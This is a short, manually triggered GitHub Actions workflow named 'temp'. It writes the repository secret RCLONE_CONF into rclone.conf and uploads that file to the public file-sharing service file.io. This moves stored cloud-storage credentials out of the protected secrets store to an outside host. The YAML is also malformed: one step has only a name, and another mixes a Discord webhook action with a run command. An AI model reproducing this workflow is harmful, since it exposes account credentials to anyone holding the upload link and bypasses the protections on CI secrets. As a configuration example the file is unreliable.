name: temp
on: 
  workflow_dispatch:
jobs:
 rclone:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@master
      - name: send 3
      - uses: tsickert/discord-webhook@v5.3.0
        run: echo ${{ secrets.RCLONE_CONF}} >> rclone.conf

      - name: upload
        uses: heowc/action-file.io@0.2.0
        with:
          file_path: 'rclone.conf'
